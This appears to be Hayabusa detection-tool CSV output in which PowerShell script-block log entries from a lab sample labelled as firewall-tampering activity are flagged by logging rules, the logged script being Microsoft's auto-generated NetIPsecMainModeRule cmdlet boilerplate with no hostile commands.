$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh 
